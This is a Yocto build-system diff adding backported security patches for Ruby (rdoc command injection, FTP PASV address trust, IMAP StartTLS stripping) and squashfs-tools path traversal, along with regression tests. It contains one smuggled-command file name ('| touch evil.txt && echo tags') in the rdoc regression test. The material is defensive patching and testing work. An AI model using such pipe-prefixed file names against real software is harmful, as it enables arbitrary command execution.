+Upstream-Status: Backport [debian]
+
+Signed-off-by: Antonio Terceiro <terceiro@debian.org>
+Signed-off-by: Christian Hofstaedtler <zeha@debian.org>
+---
+ lib/rubygems/specification.rb | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+--- a/lib/rubygems/specification.rb
++++ b/lib/rubygems/specification.rb
+@@ -1695,7 +1695,9 @@
+ raise(Gem::InvalidSpecificationException,
+ "invalid date format in specification: #{date.inspect}")
+ end
+- when Time, DateLike then
++ when Time then
++ Time.utc(date.utc.year, date.utc.month, date.utc.day)
++ when DateLike then
+ Time.utc(date.year, date.month, date.day)
+ else
+ TODAY
diff --git a/meta/recipes-devtools/ruby/ruby/0006-Make-gemspecs-reproducible.patch b/meta/recipes-devtools/ruby/ruby/0006-Make-gemspecs-reproducible.patch
new file mode 100644
index 00000000000..504893b4b4f
--- /dev/null
+++ b/meta/recipes-devtools/ruby/ruby/0006-Make-gemspecs-reproducible.patch
@@ -0,0 +1,67 @@
+From: Lucas Kanashiro <kanashiro@debian.org>
+Date: Fri, 1 Nov 2019 15:25:17 -0300
+Subject: Make gemspecs reproducible
+
+Without an explicit date, they will get the current date and make the
+build unreproducible
+
+Upstream-Status: Backport [debian]
+
+---
+ ext/bigdecimal/bigdecimal.gemspec | 1 +
+ ext/fiddle/fiddle.gemspec | 1 +
+ ext/io/console/io-console.gemspec | 2 +-
+ lib/ipaddr.gemspec | 1 +
+ lib/rdoc/rdoc.gemspec | 1 +
+ 5 files changed, 5 insertions(+), 1 deletion(-)
+
+--- a/ext/bigdecimal/bigdecimal.gemspec
++++ b/ext/bigdecimal/bigdecimal.gemspec
+@@ -6,6 +6,7 @@
+ s.name = "bigdecimal"
+ s.version = bigdecimal_version
+ s.authors = ["Kenta Murata", "Zachary Scott", "Shigeo Kobayashi"]
++ s.date = RUBY_RELEASE_DATE
+ s.email = ["mrkn@mrkn.jp"]
+
+ s.summary = "Arbitrary-precision decimal floating-point number library."
+--- a/ext/fiddle/fiddle.gemspec
++++ b/ext/fiddle/fiddle.gemspec
+@@ -8,6 +8,7 @@
+ Gem::Specification.new do |spec|
+ spec.name = "fiddle"
+ spec.version = version_module::Fiddle::VERSION
++ spec.date = RUBY_RELEASE_DATE
+ spec.authors = ["Aaron Patterson", "SHIBATA Hiroshi"]
+ spec.email = ["aaron@tenderlovemaking.com", "hsbt@ruby-lang.org"]
+
+--- a/ext/io/console/io-console.gemspec
++++ b/ext/io/console/io-console.gemspec
+@@ -4,6 +4,7 @@
+ Gem::Specification.new do |s|
+ s.name = "io-console"
+ s.version = _VERSION
++ s.date = RUBY_RELEASE_DATE
+ s.summary = "Console interface"
+ s.email = "nobu@ruby-lang.org"
+ s.description = "add console capabilities to IO instances."
+--- a/lib/ipaddr.gemspec
++++ b/lib/ipaddr.gemspec
+@@ -6,6 +6,7 @@
+ Gem::Specification.new do |spec|
+ spec.name = "ipaddr"
+ spec.version = "1.2.2"
++ spec.date = RUBY_RELEASE_DATE
+ spec.authors = ["Akinori MUSHA", "Hajimu UMEMOTO"]
+ spec.email = ["knu@idaemons.org", "ume@mahoroba.org"]
+
+--- a/lib/rdoc/rdoc.gemspec
++++ b/lib/rdoc/rdoc.gemspec
+@@ -7,6 +7,7 @@
+
+ Gem::Specification.new do |s|
+ s.name = "rdoc"
++ s.date = RUBY_RELEASE_DATE
+ s.version = RDoc::VERSION
+
+ s.authors = [
diff --git a/meta/recipes-devtools/ruby/ruby/CVE-2021-31799.patch b/meta/recipes-devtools/ruby/ruby/CVE-2021-31799.patch
new file mode 100644
index 00000000000..83064e85abf
--- /dev/null
+++ b/meta/recipes-devtools/ruby/ruby/CVE-2021-31799.patch
@@ -0,0 +1,57 @@
+From b1c73f239fe9af97de837331849f55d67c27561e Mon Sep 17 00:00:00 2001
+From: aycabta <aycabta@gmail.com>
+Date: Sun, 2 May 2021 20:52:23 +0900
+Subject: [PATCH] [ruby/rdoc] Use File.open to fix the OS Command Injection
+ vulnerability in CVE-2021-31799
+
+https://github.com/ruby/rdoc/commit/a7f5d6ab88
+
+CVE: CVE-2021-31799
+
+Upstream-Status: Backport[https://github.com/ruby/ruby/commit/b1c73f239fe9af97de837331849f55d67c27561e]
+
+Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
+---
+ lib/rdoc/rdoc.rb | 2 +-
+ test/rdoc/test_rdoc_rdoc.rb | 12 ++++++++++++
+ 2 files changed, 13 insertions(+), 1 deletion(-)
+
+diff --git a/lib/rdoc/rdoc.rb b/lib/rdoc/rdoc.rb
+index 680a8612f7..904625f105 100644
+--- a/lib/rdoc/rdoc.rb
++++ b/lib/rdoc/rdoc.rb
+@@ -444,7 +444,7 @@ def remove_unparseable files
+ files.reject do |file, *|
+ file =~ /\.(?:class|eps|erb|scpt\.txt|svg|ttf|yml)$/i or
+ (file =~ /tags$/i and
+- open(file, 'rb') { |io|
++ File.open(file, 'rb') { |io|
+ io.read(100) =~ /\A(\f\n[^,]+,\d+$|!_TAG_)/
+ })
+ end
+diff --git a/test/rdoc/test_rdoc_rdoc.rb b/test/rdoc/test_rdoc_rdoc.rb
+index 3910dd4656..a83d5a1b88 100644
+--- a/test/rdoc/test_rdoc_rdoc.rb
++++ b/test/rdoc/test_rdoc_rdoc.rb
+@@ -456,6 +456,18 @@ def test_remove_unparseable_tags_vim
+ end
+ end
+
++ def test_remove_unparseable_CVE_2021_31799
++ temp_dir do
++ file_list = ['| touch evil.txt && echo tags']
++ file_list.each do |f|
++ FileUtils.touch f
++ end
++
++ assert_equal file_list, @rdoc.remove_unparseable(file_list)
++ assert_equal file_list, Dir.children('.')
++ end
++ end
++
+ def test_setup_output_dir
+ Dir.mktmpdir {|d|
+ path = File.join d, 'testdir'
+--
+2.17.1
+
diff --git a/meta/recipes-devtools/ruby/ruby/CVE-2021-31810.patch b/meta/recipes-devtools/ruby/ruby/CVE-2021-31810.patch
new file mode 100644
index 00000000000..69d774e0b71
--- /dev/null
+++ b/meta/recipes-devtools/ruby/ruby/CVE-2021-31810.patch
@@ -0,0 +1,258 @@
+From 8cebc092cd18f4cfb669f66018ea8ffc6f408584 Mon Sep 17 00:00:00 2001
+From: Yusuke Endoh <mame@ruby-lang.org>
+Date: Wed, 7 Jul 2021 11:57:15 +0900
+Subject: [PATCH] Ignore IP addresses in PASV responses by default, and add new
+ option use_pasv_ip
+
+This fixes CVE-2021-31810.
+Reported by Alexandr Savca.
+
+Co-authored-by: Shugo Maeda <shugo@ruby-lang.org>
+
+CVE: CVE-2021-31810
+
+Upstream-Status: Backport
+[https://github.com/ruby/ruby/commit/bf4d05173c7cf04d8892e4b64508ecf7902717cd]
+
+Signed-off-by: Yi Zhao <yi.zhao@windriver.com>
+---
+ lib/net/ftp.rb | 15 +++-
+ test/net/ftp/test_ftp.rb | 159 ++++++++++++++++++++++++++++++++++++++-
+ 2 files changed, 170 insertions(+), 4 deletions(-)
+
+diff --git a/lib/net/ftp.rb b/lib/net/ftp.rb
+index 88e8655..d6f5cc3 100644
+--- a/lib/net/ftp.rb
++++ b/lib/net/ftp.rb
+@@ -98,6 +98,10 @@ module Net
+ # When +true+, the connection is in passive mode. Default: +true+.
+ attr_accessor :passive
+
++ # When +true+, use the IP address in PASV responses. Otherwise, it uses
++ # the same IP address for the control connection. Default: +false+.
++ attr_accessor :use_pasv_ip
++
+ # When +true+, all traffic to and from the server is written
+ # to +$stdout+. Default: +false+.
+ attr_accessor :debug_mode
+@@ -206,6 +210,9 @@ module Net
+ # handshake.
+ # See Net::FTP#ssl_handshake_timeout for
+ # details. Default: +nil+.
++ # use_pasv_ip:: When +true+, use the IP address in PASV responses.
++ # Otherwise, it uses the same IP address for the control
++ # connection. Default: +false+.
+ # debug_mode:: When +true+, all traffic to and from the server is
+ # written to +$stdout+. Default: +false+.
+ #
+@@ -266,6 +273,7 @@ module Net
+ @open_timeout = options[:open_timeout]
+ @ssl_handshake_timeout = options[:ssl_handshake_timeout]
+ @read_timeout = options[:read_timeout] || 60
++ @use_pasv_ip = options[:use_pasv_ip] || false
+ if host
+ connect(host, options[:port] || FTP_PORT)
+ if options[:username]
+@@ -1371,7 +1379,12 @@ module Net
+ raise FTPReplyError, resp
+ end
+ if m = /\((?<host>\d+(?:,\d+){3}),(?<port>\d+,\d+)\)/.match(resp)
+- return parse_pasv_ipv4_host(m["host"]), parse_pasv_port(m["port"])
++ if @use_pasv_ip
++ host = parse_pasv_ipv4_host(m["host"])
++ else
++ host = @bare_sock.remote_address.ip_address
++ end
++ return host, parse_pasv_port(m["port"])
+ else
+ raise FTPProtoError, resp
+ end
+diff --git a/test/net/ftp/test_ftp.rb b/test/net/ftp/test_ftp.rb
+index 023e794..243d4ad 100644
+--- a/test/net/ftp/test_ftp.rb
++++ b/test/net/ftp/test_ftp.rb
+@@ -61,7 +61,7 @@ class FTPTest < Test::Unit::TestCase
+ end
+
+ def test_parse227
+- ftp = Net::FTP.new
++ ftp = Net::FTP.new(nil, use_pasv_ip: true)
+ host, port = ftp.send(:parse227, "227 Entering Passive Mode (192,168,0,1,12,34)")
+ assert_equal("192.168.0.1", host)
+ assert_equal(3106, port)
+@@ -80,6 +80,14 @@ class FTPTest < Test::Unit::TestCase
+ assert_raise(Net::FTPProtoError) do
+ ftp.send(:parse227, "227 ) foo bar (")
+ end
++
++ ftp = Net::FTP.new
++ sock = OpenStruct.new
++ sock.remote_address = OpenStruct.new
++ sock.remote_address.ip_address = "10.0.0.1"
++ ftp.instance_variable_set(:@bare_sock, sock)
++ host, port = ftp.send(:parse227, "227 Entering Passive Mode (192,168,0,1,12,34)")
++ assert_equal("10.0.0.1", host)
+ end
+
+ def test_parse228
+@@ -2474,10 +2482,155 @@ EOF
+ end
+ end
+
++ def test_ignore_pasv_ip
++ commands = []
++ binary_data = (0..0xff).map {|i| i.chr}.join * 4 * 3
++ server = create_ftp_server(nil, "127.0.0.1") { |sock|
++ sock.print("220 (test_ftp).\r\n")
++ commands.push(sock.gets)
++ sock.print("331 Please specify the password.\r\n")
++ commands.push(sock.gets)
++ sock.print("230 Login successful.\r\n")
++ commands.push(sock.gets)
++ sock.print("200 Switching to Binary mode.\r\n")
++ line = sock.gets
++ commands.push(line)
++ data_server = TCPServer.new("127.0.0.1", 0)
++ port = data_server.local_address.ip_port
++ sock.printf("227 Entering Passive Mode (999,0,0,1,%s).\r\n",
++ port.divmod(256).join(","))
++ commands.push(sock.gets)
++ sock.print("150 Opening BINARY mode data connection for foo (#{binary_data.size} bytes)\r\n")
++ conn = data_server.accept
++ binary_data.scan(/.{1,1024}/nm) do |s|
++ conn.print(s)
++ end
++ conn.shutdown(Socket::SHUT_WR)
++ conn.read
++ conn.close
++ data_server.close
++ sock.print("226 Transfer complete.\r\n")
++ }
++ begin
++ begin
++ ftp = Net::FTP.new
++ ftp.passive = true
++ ftp.read_timeout *= 5 if defined?(RubyVM::MJIT) && RubyVM::MJIT.enabled? # for --jit-wait
++ ftp.connect("127.0.0.1", server.port)
++ ftp.login
++ assert_match(/\AUSER /, commands.shift)
++ assert_match(/\APASS /, commands.shift)
++ assert_equal("TYPE I\r\n", commands.shift)
++ buf = ftp.getbinaryfile("foo", nil)
++ assert_equal(binary_data, buf)
++ assert_equal(Encoding::ASCII_8BIT, buf.encoding)
++ assert_equal("PASV\r\n", commands.shift)
++ assert_equal("RETR foo\r\n", commands.shift)
++ assert_equal(nil, commands.shift)
++ ensure
++ ftp.close if ftp
++ end
++ ensure
++ server.close
++ end
++ end
++
++ def test_use_pasv_ip
++ commands = []
++ binary_data = (0..0xff).map {|i| i.chr}.join * 4 * 3
++ server = create_ftp_server(nil, "127.0.0.1") { |sock|
++ sock.print("220 (test_ftp).\r\n")
++ commands.push(sock.gets)
++ sock.print("331 Please specify the password.\r\n")
++ commands.push(sock.gets)
++ sock.print("230 Login successful.\r\n")
++ commands.push(sock.gets)
++ sock.print("200 Switching to Binary mode.\r\n")
++ line = sock.gets
++ commands.push(line)
++ data_server = TCPServer.new("127.0.0.1", 0)
++ port = data_server.local_address.ip_port
++ sock.printf("227 Entering Passive Mode (127,0,0,1,%s).\r\n",
++ port.divmod(256).join(","))
++ commands.push(sock.gets)
++ sock.print("150 Opening BINARY mode data connection for foo (#{binary_data.size} bytes)\r\n")
++ conn = data_server.accept
++ binary_data.scan(/.{1,1024}/nm) do |s|
++ conn.print(s)
++ end
++ conn.shutdown(Socket::SHUT_WR)
++ conn.read
++ conn.close
++ data_server.close
++ sock.print("226 Transfer complete.\r\n")
++ }
++ begin
++ begin
++ ftp = Net::FTP.new
++ ftp.passive = true
++ ftp.use_pasv_ip = true
++ ftp.read_timeout *= 5 if defined?(RubyVM::MJIT) && RubyVM::MJIT.enabled? # for --jit-wait
++ ftp.connect("127.0.0.1", server.port)
++ ftp.login
++ assert_match(/\AUSER /, commands.shift)
++ assert_match(/\APASS /, commands.shift)
++ assert_equal("TYPE I\r\n", commands.shift)
++ buf = ftp.getbinaryfile("foo", nil)
++ assert_equal(binary_data, buf)
++ assert_equal(Encoding::ASCII_8BIT, buf.encoding)
++ assert_equal("PASV\r\n", commands.shift)
++ assert_equal("RETR foo\r\n", commands.shift)
++ assert_equal(nil, commands.shift)
++ ensure
++ ftp.close if ftp
++ end
++ ensure
++ server.close
++ end
++ end
++
++ def test_use_pasv_invalid_ip
++ commands = []
++ binary_data = (0..0xff).map {|i| i.chr}.join * 4 * 3
++ server = create_ftp_server(nil, "127.0.0.1") { |sock|
++ sock.print("220 (test_ftp).\r\n")
++ commands.push(sock.gets)
++ sock.print("331 Please specify the password.\r\n")
++ commands.push(sock.gets)
++ sock.print("230 Login successful.\r\n")
++ commands.push(sock.gets)
++ sock.print("200 Switching to Binary mode.\r\n")
++ line = sock.gets
++ commands.push(line)
++ sock.print("227 Entering Passive Mode (999,0,0,1,48,57).\r\n")
++ commands.push(sock.gets)
++ }
++ begin
++ begin
++ ftp = Net::FTP.new
++ ftp.passive = true
++ ftp.use_pasv_ip = true
++ ftp.read_timeout *= 5 if defined?(RubyVM::MJIT) && RubyVM::MJIT.enabled? # for --jit-wait
++ ftp.connect("127.0.0.1", server.port)
++ ftp.login
++ assert_match(/\AUSER /, commands.shift)
++ assert_match(/\APASS /, commands.shift)
++ assert_equal("TYPE I\r\n", commands.shift)
++ assert_raise(SocketError) do
++ ftp.getbinaryfile("foo", nil)
++ end
++ ensure
++ ftp.close if ftp
++ end
++ ensure
++ server.close
++ end
++ end
++
+ private
+
+- def create_ftp_server(sleep_time = nil)
+- server = TCPServer.new(SERVER_ADDR, 0)
++ def create_ftp_server(sleep_time = nil, addr = SERVER_ADDR)
++ server = TCPServer.new(addr, 0)
+ @thread = Thread.start do
+ if sleep_time
+ sleep(sleep_time)
+--
+2.17.1
+
diff --git a/meta/recipes-devtools/ruby/ruby/CVE-2021-32066.patch b/meta/recipes-devtools/ruby/ruby/CVE-2021-32066.patch
new file mode 100644
index 00000000000..b78a74a4b59
--- /dev/null
+++ b/meta/recipes-devtools/ruby/ruby/CVE-2021-32066.patch
@@ -0,0 +1,102 @@
+From e2ac25d0eb66de99f098d6669cf4f06796aa6256 Mon Sep 17 00:00:00 2001
+From: Shugo Maeda <shugo@ruby-lang.org>
+Date: Tue, 11 May 2021 10:31:27 +0900
+Subject: [PATCH] Fix StartTLS stripping vulnerability
+
+This fixes CVE-2021-32066.
+Reported by Alexandr Savca in <https://hackerone.com/reports/1178562>.
+
+CVE: CVE-2021-32066
+
+Upstream-Status: Backport
+[https://github.com/ruby/ruby/commit/e2ac25d0eb66de99f098d6669cf4f06796aa6256]
+
+Signed-off-by: Yi Zhao <yi.zhao@windriver.com>
+---
+ lib/net/imap.rb | 8 +++++++-
+ test/net/imap/test_imap.rb | 31 +++++++++++++++++++++++++++++++
+ 2 files changed, 38 insertions(+), 1 deletion(-)
+
+diff --git a/lib/net/imap.rb b/lib/net/imap.rb
+index 505b4c8950..d45304f289 100644
+--- a/lib/net/imap.rb
++++ b/lib/net/imap.rb
+@@ -1218,12 +1218,14 @@ def get_tagged_response(tag, cmd)
+ end
+ resp = @tagged_responses.delete(tag)
+ case resp.name
++ when /\A(?:OK)\z/ni
++ return resp
+ when /\A(?:NO)\z/ni
+ raise NoResponseError, resp
+ when /\A(?:BAD)\z/ni
+ raise BadResponseError, resp
+ else
+- return resp
++ raise UnknownResponseError, resp
+ end
+ end
+
+@@ -3719,6 +3721,10 @@ class BadResponseError < ResponseError
+ class ByeResponseError < ResponseError
+ end
+
++ # Error raised upon an unknown response from the server.
++ class UnknownResponseError < ResponseError
++ end
++
+ RESPONSE_ERRORS = Hash.new(ResponseError)
+ RESPONSE_ERRORS["NO"] = NoResponseError
+ RESPONSE_ERRORS["BAD"] = BadResponseError
+diff --git a/test/net/imap/test_imap.rb b/test/net/imap/test_imap.rb
+index 8b924b524e..85fb71d440 100644
+--- a/test/net/imap/test_imap.rb
++++ b/test/net/imap/test_imap.rb
+@@ -127,6 +127,16 @@ def test_starttls
+ imap.disconnect
+ end
+ end
++
++ def test_starttls_stripping
++ starttls_stripping_test do |port|
++ imap = Net::IMAP.new("localhost", :port => port)
++ assert_raise(Net::IMAP::UnknownResponseError) do
++ imap.starttls(:ca_file => CA_FILE)
++ end
++ imap
++ end
++ end
+ end
+
+ def start_server
+@@ -834,6 +844,27 @@ def starttls_test
+ end
+ end
+
++ def starttls_stripping_test
++ server = create_tcp_server
++ port = server.addr[1]
++ start_server do
++ sock = server.accept
++ begin
++ sock.print("* OK test server\r\n")
++ sock.gets
++ sock.print("RUBY0001 BUG unhandled command\r\n")
++ ensure
++ sock.close
++ server.close
++ end
++ end
++ begin
++ imap = yield(port)
++ ensure
++ imap.disconnect if imap && !imap.disconnected?
++ end
++ end
++
+ def create_tcp_server
+ return TCPServer.new(server_addr, 0)
+ end
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/ruby/ruby_3.0.1.bb b/meta/recipes-devtools/ruby/ruby_3.0.1.bb
index 944cb81c1df..a3489469729 100644
--- a/meta/recipes-devtools/ruby/ruby_3.0.1.bb
+++ b/meta/recipes-devtools/ruby/ruby_3.0.1.bb
@@ -6,6 +6,13 @@ SRC_URI += " \
file://remove_has_include_macros.patch \
file://run-ptest \
file://0001-template-Makefile.in-do-not-write-host-cross-cc-item.patch \
+ file://CVE-2021-31810.patch \
+ file://CVE-2021-32066.patch \
+ file://CVE-2021-31799.patch \
+ file://0003-rdoc-build-reproducible-documentation.patch \
+ file://0004-lib-mkmf.rb-sort-list-of-object-files-in-generated-M.patch \
+ file://0005-Mark-Gemspec-reproducible-change-fixing-784225-too.patch \
+ file://0006-Make-gemspecs-reproducible.patch \
"
SRC_URI[sha256sum] = "369825db2199f6aeef16b408df6a04ebaddb664fb9af0ec8c686b0ce7ab77727"
diff --git a/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch b/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch
new file mode 100644
index 00000000000..95e2534ee44
--- /dev/null
+++ b/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch
@@ -0,0 +1,253 @@
+Backport patch to fix CVE-2021-40153, and remove version update in unsquashfs.c
+for compatible.
+
+Upstream-Status: Backport [https://github.com/plougher/squashfs-tools/commit/79b5a55]
+CVE: CVE-2021-40153
+
+Signed-off-by: Kai Kang <kai.kang@windriver.com>
+
+From 79b5a555058eef4e1e7ff220c344d39f8cd09646 Mon Sep 17 00:00:00 2001
+From: Phillip Lougher <phillip@squashfs.org.uk>
+Date: Sat, 16 Jan 2021 20:08:55 +0000
+Subject: [PATCH] Unsquashfs: fix write outside destination directory exploit
+
+An issue on Github (https://github.com/plougher/squashfs-tools/issues/72)
+shows how some specially crafted Squashfs filesystems containing
+invalid file names (with '/' and ..) can cause Unsquashfs to write
+files outside of the destination directory.
+
+This commit fixes this exploit by checking all names for
+validity.
+
+In doing so I have also added checks for '.' and for names that
+are shorter than they should be (names in the file system should
+not have '\0' terminators).
+
+Signed-off-by: Phillip Lougher <phillip@squashfs.org.uk>
+---
+ squashfs-tools/Makefile | 5 ++-
+ squashfs-tools/unsquash-1.c | 9 +++++-
+ squashfs-tools/unsquash-1234.c | 58 ++++++++++++++++++++++++++++++++++
+ squashfs-tools/unsquash-2.c | 9 +++++-
+ squashfs-tools/unsquash-3.c | 9 +++++-
+ squashfs-tools/unsquash-4.c | 9 +++++-
+ squashfs-tools/unsquashfs.h | 5 ++-
+ 7 files changed, 98 insertions(+), 6 deletions(-)
+ create mode 100644 squashfs-tools/unsquash-1234.c
+
+diff --git a/squashfs-tools/Makefile b/squashfs-tools/Makefile
+index aee4b960..20feaca2 100644
+--- a/squashfs-tools/Makefile
++++ b/squashfs-tools/Makefile
+@@ -156,7 +156,8 @@ MKSQUASHFS_OBJS = mksquashfs.o read_fs.o action.o swap.o pseudo.o compressor.o \
+ caches-queues-lists.o
+
+ UNSQUASHFS_OBJS = unsquashfs.o unsquash-1.o unsquash-2.o unsquash-3.o \
+- unsquash-4.o unsquash-123.o unsquash-34.o swap.o compressor.o unsquashfs_info.o
++ unsquash-4.o unsquash-123.o unsquash-34.o unsquash-1234.o swap.o \
++ compressor.o unsquashfs_info.o
+
+ CFLAGS ?= -O2
+ CFLAGS += $(EXTRA_CFLAGS) $(INCLUDEDIR) -D_FILE_OFFSET_BITS=64 \
+@@ -350,6 +351,8 @@ unsquash-123.o: unsquashfs.h unsquash-123.c squashfs_fs.h squashfs_compat.h
+
+ unsquash-34.o: unsquashfs.h unsquash-34.c
+
++unsquash-1234.o: unsquash-1234.c
++
+ unsquashfs_xattr.o: unsquashfs_xattr.c unsquashfs.h squashfs_fs.h xattr.h
+
+ unsquashfs_info.o: unsquashfs.h squashfs_fs.h
+diff --git a/squashfs-tools/unsquash-1.c b/squashfs-tools/unsquash-1.c
+index 34eced36..28326cb1 100644
+--- a/squashfs-tools/unsquash-1.c
++++ b/squashfs-tools/unsquash-1.c
+@@ -2,7 +2,7 @@
+ * Unsquash a squashfs filesystem. This is a highly compressed read only
+ * filesystem.
+ *
+- * Copyright (c) 2009, 2010, 2011, 2012, 2019
++ * Copyright (c) 2009, 2010, 2011, 2012, 2019, 2021
+ * Phillip Lougher <phillip@squashfs.org.uk>
+ *
+ * This program is free software; you can redistribute it and/or
+@@ -285,6 +285,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
+ memcpy(dire->name, directory_table + bytes,
+ dire->size + 1);
+ dire->name[dire->size + 1] = '\0';
++
++ /* check name for invalid characters (i.e /, ., ..) */
++ if(check_name(dire->name, dire->size + 1) == FALSE) {
++ ERROR("File system corrupted: invalid characters in name\n");
++ goto corrupted;
++ }
++
+ TRACE("squashfs_opendir: directory entry %s, inode "
+ "%d:%d, type %d\n", dire->name,
+ dirh.start_block, dire->offset, dire->type);
+diff --git a/squashfs-tools/unsquash-1234.c b/squashfs-tools/unsquash-1234.c
+new file mode 100644
+index 00000000..c2d4f42b
+--- /dev/null
++++ b/squashfs-tools/unsquash-1234.c
+@@ -0,0 +1,58 @@
++/*
++ * Unsquash a squashfs filesystem. This is a highly compressed read only
++ * filesystem.
++ *
++ * Copyright (c) 2021
++ * Phillip Lougher <phillip@squashfs.org.uk>
++ *
++ * This program is free software; you can redistribute it and/or
++ * modify it under the terms of the GNU General Public License
++ * as published by the Free Software Foundation; either version 2,
++ * or (at your option) any later version.
++ *
++ * This program is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
++ * GNU General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with this program; if not, write to the Free Software
++ * Foundation, 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
++ *
++ * unsquash-1234.c
++ *
++ * Helper functions used by unsquash-1, unsquash-2, unsquash-3 and
++ * unsquash-4.
++ */
++
++#define TRUE 1
++#define FALSE 0
++/*
++ * Check name for validity, name should not
++ * - be ".", "./", or
++ * - be "..", "../" or
++ * - have a "/" anywhere in the name, or
++ * - be shorter than the expected size
++ */
++int check_name(char *name, int size)
++{
++ char *start = name;
++
++ if(name[0] == '.') {
++ if(name[1] == '.')
++ name++;
++ if(name[1] == '/' || name[1] == '\0')
++ return FALSE;
++ }
++
++ while(name[0] != '/' && name[0] != '\0')
++ name ++;
++
++ if(name[0] == '/')
++ return FALSE;
++
++ if((name - start) != size)
++ return FALSE;
++
++ return TRUE;
++}
+diff --git a/squashfs-tools/unsquash-2.c b/squashfs-tools/unsquash-2.c
+index 4b3d767e..474064e1 100644
+--- a/squashfs-tools/unsquash-2.c
++++ b/squashfs-tools/unsquash-2.c
+@@ -2,7 +2,7 @@
+ * Unsquash a squashfs filesystem. This is a highly compressed read only
+ * filesystem.
+ *
+- * Copyright (c) 2009, 2010, 2013, 2019
++ * Copyright (c) 2009, 2010, 2013, 2019, 2021
+ * Phillip Lougher <phillip@squashfs.org.uk>
+ *
+ * This program is free software; you can redistribute it and/or
+@@ -386,6 +386,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
+ memcpy(dire->name, directory_table + bytes,
+ dire->size + 1);
+ dire->name[dire->size + 1] = '\0';
++
++ /* check name for invalid characters (i.e /, ., ..) */
++ if(check_name(dire->name, dire->size + 1) == FALSE) {
++ ERROR("File system corrupted: invalid characters in name\n");
++ goto corrupted;
++ }
++
+ TRACE("squashfs_opendir: directory entry %s, inode "
+ "%d:%d, type %d\n", dire->name,
+ dirh.start_block, dire->offset, dire->type);
+diff --git a/squashfs-tools/unsquash-3.c b/squashfs-tools/unsquash-3.c
+index 02c31fc5..65cfe4d9 100644
+--- a/squashfs-tools/unsquash-3.c
++++ b/squashfs-tools/unsquash-3.c
+@@ -2,7 +2,7 @@
+ * Unsquash a squashfs filesystem. This is a highly compressed read only
+ * filesystem.
+ *
+- * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019
++ * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019, 2021
+ * Phillip Lougher <phillip@squashfs.org.uk>
+ *
+ * This program is free software; you can redistribute it and/or
+@@ -413,6 +413,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
+ memcpy(dire->name, directory_table + bytes,
+ dire->size + 1);
+ dire->name[dire->size + 1] = '\0';
++
++ /* check name for invalid characters (i.e /, ., ..) */
++ if(check_name(dire->name, dire->size + 1) == FALSE) {
++ ERROR("File system corrupted: invalid characters in name\n");
++ goto corrupted;
++ }
++
+ TRACE("squashfs_opendir: directory entry %s, inode "
+ "%d:%d, type %d\n", dire->name,
+ dirh.start_block, dire->offset, dire->type);
+diff --git a/squashfs-tools/unsquash-4.c b/squashfs-tools/unsquash-4.c
+index 8475835c..aa23a841 100644
+--- a/squashfs-tools/unsquash-4.c
++++ b/squashfs-tools/unsquash-4.c
+@@ -2,7 +2,7 @@
+ * Unsquash a squashfs filesystem. This is a highly compressed read only
+ * filesystem.
+ *
+- * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019
++ * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019, 2021
+ * Phillip Lougher <phillip@squashfs.org.uk>
+ *
+ * This program is free software; you can redistribute it and/or
+@@ -349,6 +349,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
+ memcpy(dire->name, directory_table + bytes,
+ dire->size + 1);
+ dire->name[dire->size + 1] = '\0';
++
++ /* check name for invalid characters (i.e /, ., ..) */
++ if(check_name(dire->name, dire->size + 1) == FALSE) {
++ ERROR("File system corrupted: invalid characters in name\n");
++ goto corrupted;
++ }
++
+ TRACE("squashfs_opendir: directory entry %s, inode "
+ "%d:%d, type %d\n", dire->name,
+ dirh.start_block, dire->offset, dire->type);
+diff --git a/squashfs-tools/unsquashfs.h b/squashfs-tools/unsquashfs.h
+index 934618b2..db1da7a0 100644
+--- a/squashfs-tools/unsquashfs.h
++++ b/squashfs-tools/unsquashfs.h
+@@ -4,7 +4,7 @@
+ * Unsquash a squashfs filesystem. This is a highly compressed read only
+ * filesystem.
+ *
+- * Copyright (c) 2009, 2010, 2013, 2014, 2019
++ * Copyright (c) 2009, 2010, 2013, 2014, 2019, 2021
+ * Phillip Lougher <phillip@squashfs.org.uk>
+ *
+ * This program is free software; you can redistribute it and/or
+@@ -261,4 +261,7 @@ extern int read_ids(int, long long, long long, unsigned int **);
+
+ /* unsquash-34.c */
+ extern long long *alloc_index_table(int);
++
++/* unsquash-1234.c */
++extern int check_name(char *, int);
+ #endif
diff --git a/meta/recipes-devtools/squashfs-tools/files/CVE-2021-41072-requisite-1.patch b/meta/recipes-devtools/squashfs-tools/files/CVE-2021-41072-requisite-1.patch
new file mode 100644
index 00000000000..d01b5c68711
--- /dev/null
+++ b/meta/recipes-devtools/squashfs-tools/files/CVE-2021-41072-requisite-1.patch
@@ -0,0 +1,135 @@
+The commit is required by the fix for CVE-2021-41072.
+
+Upstream-Status: Backport [https://github.com/plougher/squashfs-tools/commit/80b8441]
+
+Signed-off-by: Kai Kang <kai.kang@windriver.com>
+
+From 80b8441a37fcf8bf07dacf24d9d6c6459a0f6e36 Mon Sep 17 00:00:00 2001
+From: Phillip Lougher <phillip@squashfs.org.uk>
+Date: Sun, 12 Sep 2021 19:58:19 +0100
+Subject: [PATCH] unsquashfs: use squashfs_closedir() to delete directory
+
+Signed-off-by: Phillip Lougher <phillip@squashfs.org.uk>
+---
+ squashfs-tools/unsquash-1.c | 3 +--
+ squashfs-tools/unsquash-1234.c | 11 +++++++++--
+ squashfs-tools/unsquash-2.c | 3 +--
+ squashfs-tools/unsquash-3.c | 3 +--
+ squashfs-tools/unsquash-4.c | 3 +--
+ squashfs-tools/unsquashfs.c | 7 -------
